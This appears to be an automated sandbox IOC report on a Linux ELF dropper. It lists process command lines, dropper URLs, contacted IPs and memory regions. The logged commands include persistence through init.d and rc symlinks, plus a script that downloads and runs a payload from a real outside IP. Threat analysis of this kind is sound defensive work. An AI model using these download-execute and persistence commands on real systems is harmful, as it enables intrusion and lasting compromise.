Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

/tmp/HUWwCrf0mn.elf

/bin/sh

sh -c "systemctl enable custom.service >/dev/null 2>&1"

/bin/sh

/usr/bin/systemctl

systemctl enable custom.service

/tmp/HUWwCrf0mn.elf

/bin/sh

sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/mybinary

/tmp/HUWwCrf0mn.elf

/bin/sh

sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary

/tmp/HUWwCrf0mn.elf

/bin/sh

sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://154.216.19.140/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"

/tmp/HUWwCrf0mn.elf

/bin/sh

sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/sh

/tmp/HUWwCrf0mn.elf

/bin/sh

sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

/bin/sh

/usr/bin/mkdir

mkdir -p /etc/rc.d

/tmp/HUWwCrf0mn.elf

/bin/sh

sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/sh /etc/rc.d/S99sh

/tmp/HUWwCrf0mn.elf

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/systemd/systemd

/usr/lib/systemd/system-environment-generators/snapd-env-generator

/usr/libexec/gnome-session-binary

/bin/sh

/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping

/usr/libexec/gsd-housekeeping

/usr/lib/systemd/systemd

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

There are 39 hidden processes, click here to show them.

URLs

Name

Malicious

http://154.216.19.140/curl.sh

unknown

Details

Name:	http://154.216.19.140/curl.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/HUWwCrf0mn.elf
Source:	HUWwCrf0mn.elf

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://154.216.19.140/lol.sh

unknown

Details

Name:	http://154.216.19.140/lol.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/HUWwCrf0mn.elf
Source:	HUWwCrf0mn.elf

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://154.216.19.140/

unknown

Details

Name:	http://154.216.19.140/
TargetID:	-1
From Memory:	true
Source:	HUWwCrf0mn.elf, profile.12.dr, inittab.12.dr, sh.37.dr, bootcmd.12.dr, mybinary.12.dr, custom.service.12.dr

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

204.157.220.45

unknown

United States

177.36.61.161

unknown

Brazil

132.178.242.205

unknown

United States

151.196.57.31

unknown

United States

34.45.137.189

unknown

United States

159.13.3.118

unknown

Australia

223.203.88.27

unknown

China

203.180.19.190

unknown

Japan

40.169.70.104

unknown

United States

145.187.240.173

unknown

Netherlands

11.116.127.116

unknown

United States

11.13.81.245

unknown

United States

170.236.1.102

unknown

Switzerland

139.116.230.220

unknown

Norway

63.252.39.135

unknown

United States

186.67.223.184

unknown

Chile

142.107.245.6

unknown

Canada

78.48.150.121

unknown

Germany

178.102.242.63

unknown

United Kingdom

12.12.20.16

unknown

United States

71.172.33.29

unknown

United States

97.171.36.255

unknown

United States

106.115.39.235

unknown

China

212.49.223.17

unknown

United Kingdom

20.175.12.205

unknown

United States

9.114.176.68

unknown

United States

163.134.3.32

unknown

Japan

105.135.94.89

unknown

Morocco

200.240.20.247

unknown

Brazil

80.180.247.233

unknown

Italy

215.136.187.76

unknown

United States

66.37.56.163

unknown

United States

185.105.156.172

unknown

Belgium

151.166.216.64

unknown

United States

115.77.143.11

unknown

Viet Nam

75.181.15.31

unknown

United States

15.91.118.240

unknown

United States

1.117.212.3

unknown

China

19.235.193.156

unknown

United States

139.50.152.189

unknown

Germany

175.53.171.161

unknown

China

132.100.187.10

unknown

United States

188.216.199.38

unknown

Italy

12.123.122.142

unknown

United States

95.166.115.94

unknown

Denmark

46.17.125.245

unknown

Serbia

138.193.31.126

unknown

United States

42.159.72.123

unknown

China

7.192.54.46

unknown

United States

94.28.109.107

unknown

Russian Federation

70.193.177.131

unknown

United States

106.3.186.24

unknown

China

124.115.2.173

unknown

China

141.158.88.201

unknown

United States

116.184.204.85

unknown

China

25.185.14.19

unknown

United Kingdom

61.75.202.21

unknown

Korea Republic of

30.53.16.47

unknown

United States

100.3.179.219

unknown

United States

217.220.11.0

unknown

Italy

151.180.166.4

unknown

United Kingdom

103.193.182.27

unknown

Cambodia

172.200.164.156

unknown

United States

179.50.127.137

unknown

Colombia

13.46.218.233

unknown

United States

37.216.24.94

unknown

Saudi Arabia

154.82.200.253

unknown

Seychelles

112.193.83.191

unknown

China

184.102.164.131

unknown

United States

135.255.82.245

unknown

United States

198.198.168.30

unknown

United States

32.117.178.68

unknown

United States

44.233.80.244

unknown

United States

17.228.43.30

unknown

United States

191.210.152.199

unknown

Brazil

112.217.185.1

unknown

Korea Republic of

151.105.34.121

unknown

Finland

219.94.46.154

unknown

Malaysia

64.25.155.240

unknown

United States

211.88.47.104

unknown

China

156.144.103.174

unknown

United States

193.143.1.59

unknown

207.234.251.241

unknown

United States

17.72.103.207

unknown

United States

217.21.57.88

unknown

Belarus

198.87.181.102

unknown

United States

99.42.143.252

unknown

United States

28.52.74.136

unknown

United States

68.12.222.23

unknown

United States

17.29.196.248

unknown

United States

210.226.230.179

unknown

Japan

122.64.21.149

unknown

China

170.84.66.130

unknown

Brazil

18.70.147.27

unknown

United States

73.150.218.84

unknown

United States

93.180.117.112

unknown

Bosnia and Herzegowina

107.253.226.218

unknown

United States

8.207.151.157

unknown

United States

161.112.87.240

unknown

United Kingdom

159.106.205.36

unknown

United States

There are 90 hidden IPs, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

418000

page execute read

418000

page execute read

518000

page read and write

2078000

page read and write

207e000

page read and write

2078000

page read and write

51b000

page read and write

7fffa5845000

page read and write

7fffa58fa000

page execute read

7fffa58fa000

page execute read

7fffa5845000

page read and write

518000

page read and write

51b000

page read and write

There are 3 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
HUWwCrf0mn.elf

Files

Processes

URLs

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC ReportHUWwCrf0mn.elf

Files

Processes

URLs

IPs

Memdumps

IOC Report
HUWwCrf0mn.elf